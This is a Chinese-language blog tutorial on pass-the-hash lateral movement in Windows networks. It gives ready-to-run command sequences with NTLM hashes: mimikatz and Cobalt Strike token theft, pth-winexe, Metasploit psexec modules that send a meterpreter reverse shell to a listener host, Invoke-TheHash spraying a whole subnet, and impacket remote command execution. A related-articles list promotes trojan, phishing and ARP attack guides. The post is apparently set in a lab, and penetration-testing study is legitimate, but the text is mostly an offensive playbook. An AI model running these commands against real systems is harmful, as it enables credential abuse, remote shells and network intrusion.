PTH橫向移動

原創 `GGyao 2020-07-01 01:34

在這裏插入圖片描述

0x01 簡介

PTH全稱“pass the hash”,即hash傳遞。PTH通過smb服務進行,走445端口。

0x02 通過PTH橫向移動

一、通過cobaltstrike進行PTH

1、在已上線機器中直接dir訪問目標系統C盤,提示沒權限。
beacon> shell dir \192.168.3.123\c$
在這裏插入圖片描述
2、此處使用先前已獲取的hash對目標administrator用戶進行PTH。(大致爲通過mimikatz和目標hash創建一個訪問令牌,此處PID爲392)

beacon> mimikatz sekurlsa::pth /user:administrator /domain:ggyao /ntlm:b4e535a9bb56bcc084602062c9e2a9d4 /run:"cmd -w hidden"
(若爲工作組環境,則命令修改爲/domain:.)

在這裏插入圖片描述3、通過cobaltstrike內置的steal_token竊取剛剛創建的令牌,竊取成功後,可正常訪問目標系統資源。

beacon> steal_token 392     
beacon> shell dir \\192.168.3.123\c$

在這裏插入圖片描述

二、通過kali自帶工具進行pth

1、相關工具如下。
在這裏插入圖片描述
2、獲取拿到權限機器的hash。
在這裏插入圖片描述
3、使用pth-winexe獲取一個cmd。

pth-winexe -U GGYAO/administrator%dc4112fd3aee4d001578da9b8ff96ce3:b4e535a9bb56bcc084602062c9e2a9d4 --system --ostype=1 //192.168.3.123 cmd

在這裏插入圖片描述

三、MSF中hash傳遞模塊的利用

psexec_command模塊(特徵明顯,少用)
1、使用psexec_command模塊進行命令執行。

msf > use auxiliary/admin/smb/psexec_command
msf > set rhosts 192.168.3.123
msf > set smbdomain GGYAO
msf > set smbuser administrator
msf > set smbpass 目標hash
msf > set command whoami
msf > set verbose true
msf > run

此處是用2003的hash成功pth了2008的機器,反之失敗:
在這裏插入圖片描述

psexec_psh模塊(特徵明顯,少用)

msf > use exploit/windows/smb/psexec_psh
msf > set rhost 192.168.3.123
msf > set smbdomain ggyao
msf > set smbuser administrator
msf > set smbpass 目標hash
msf > set payload windows/x64/meterpreter/reverse_tcp_uuid
msf > set lhost 192.168.3.86
msf > set lport 4444
msf > exploit -j -z

此處是用2003的hash成功pth了2008的機器,反之失敗:
在這裏插入圖片描述

四、通過powershell進行批量pth(wmi)

使用已知管理員hash,批量撞指定網段機器,此方式同時適用於工作組和域環境。需要同時加載Invoke-WMIExec.ps1、Invoke-TheHash.ps1。(https://github.com/Kevin-Robertson/Invoke-TheHash)
1、加載腳本。

本地加載(推薦使用)
powershell -exec bypass
Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1

在這裏插入圖片描述

2、利用已有管理員hash,批量撞指定網段機器。
域環境下:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain ggyao -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
在這裏插入圖片描述

工作組環境下:
(或者在網段後加選項 -Domain .)
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4
在這裏插入圖片描述

五、通過impacket進行hash傳遞

命令執行
1、wmiexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected] “ipconfig”
在這裏插入圖片描述

反彈shell
1、smbexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected]
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

PsExec的使用

1.本地提權到system 命令執行 PsExec.exe /accepteula /s \\127.0.0.1 cmd /c "whoami" 交互式cmd PsExec.exe /accepteula /s \\127.

`GGyao 2020-07-01 01:34:33

winRM橫向移動

0x01 winRM簡介 WinRM 是 Microsoft 對 WS-Management 協議的實現,WS-Management 協議即一種基於標準簡單對象訪問協議[SOAP]的 “防火牆友好” 協議,它讓來自不同供應商的硬

`GGyao 2020-07-01 01:34:33

域用戶爆破(DomainPasswordSpray)

0x01 介紹 地址:DomainPasswordSpray UserList - Optional UserList parameter. This will be generated automaticall

`GGyao 2020-07-01 01:34:22

Spring(二):@Scope的使用

Scope:也叫做作用域,在Spring IoC中的作用是指它創建的Bean對象對於其他Bean對象的請求的可視範圍,Spring IoC容器中定義5種常用作用域: 在Spring2.0:     1).singleton:單實例的(Sp

Lesser Flamingo 2020-07-03 21:08:13

Linux環境創建weblogic域的步驟

環境介紹: 操作系統 :Redhat 5.5 Weblogic :英文版 8.1.6 Weblogic安裝目錄 :/weblogic 一、域的建立 執行下面語句進入weblogic的bin目錄: cd /weblogic/webl

孤殇泪 2020-06-28 05:37:11

內網滲透 -- 獲取內網中其他主機權限

  每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。 ----  網易雲熱評 環境:小攻:Kali 2020,ip:192.168.1.133           小受:win7 x86,ip

web安全工具库 2020-07-05 13:24:00

【Android編程】android平臺的MITM瑞士軍刀_cSploit(dSploit)項目移植_源碼解析以及中間人攻擊復現

/文章作者:Kali_MG1937 作者博客ID:ALDYS4 QQ:3496925334 未經允許,禁止轉載/ 何爲MITM欺騙,顧名思義,中間人攻擊的含義即爲在局域網中充當數據包交換中間人的角色 這樣就可以自由攔截和查看,甚至

MG1937 2020-07-04 07:10:56

使用python的scapy模塊掃描內網主機存活

話不多說我們直接上代碼 from scapy.all import * ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.43.0/24")/"t

呆呆呆了丢 2020-07-04 05:36:55

內網滲透 -- 獲取內網瀏覽器歷史記錄等相關信息

“我喜歡你,做我女朋友可以嗎?” 電話的那頭沒有反應,男生沉不住氣了, 小心翼翼地問着,“你在幹嘛呀?” “我在點頭。” ----  網易雲熱評   環境:小攻:Kali 2020,ip:192.168.1.133           小

web安全工具库 2020-07-02 02:11:48

mailsniper.ps1使用

下載地址:mailsniper 0x01 mailsniper.ps1獲取outlook所有聯繫人(爲爆破收集郵箱) 在域環境內(域內機器即可)執行命令: powershell -exec bypass Import-Modul

`GGyao 2020-07-01 01:34:21

Linux kali內網滲透之MSF生成Trojan直取系統權限

提示:本文章內所有內容環境爲自己搭建絕無違法內容,請不要利用其中的技術來做違法的事情。 工具介紹 Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasp

Pythonicc 2020-06-24 19:13:45

Linux kali內網滲透之DNS劫持+SET社會工程學進行內網釣魚攻擊

提示:本文章內所有內容環境爲自己搭建絕無違法內容,請不要利用其中的技術來做違法的事情。若本文顯示圖片違規,請點擊鏈接https://mp.weixin.qq.com/s/ZnrPjDJ2Wh1pqKEKCVaG-w跳轉至微信公衆號

Pythonicc 2020-06-24 19:13:45

Linux kali內網滲透之ARP斷網攻擊

Linux kali內網滲透之ARP斷網攻擊 ARP斷網攻擊 如果你的kali是虛擬機 ,請將其設置爲網絡橋接模式,這樣才和內網在同一網段 如果你的kali裏沒有安裝arpspoof,請在終端輸入如下命令進行安裝 apt-get

Pythonicc 2020-06-24 19:13:45

Cobalt Strike 簡單使用

Cobalt Strike 簡單使用 我在最沒有能力的年紀,碰見了最想照顧一生的人。 概述: Cobalt Strike是一款內網滲透測試神器,一個服務端,多個客戶端,這樣最大好處就是可以團隊合作。Cobalt Strike

SoulCat. 2020-06-24 10:08:20

內網滲透之小試牛刀

內網滲透之小試牛刀 離你最近的地方,路途最遠。 文章目錄內網滲透之小試牛刀思路:獲取權限:準備工作:內網蒐集:橫向滲透:拿下域控: 思路: 獲取服務器權限->進入內網->判斷是否在域中->信息收集(定位域控、域主機、域用戶

SoulCat. 2020-06-24 10:08:20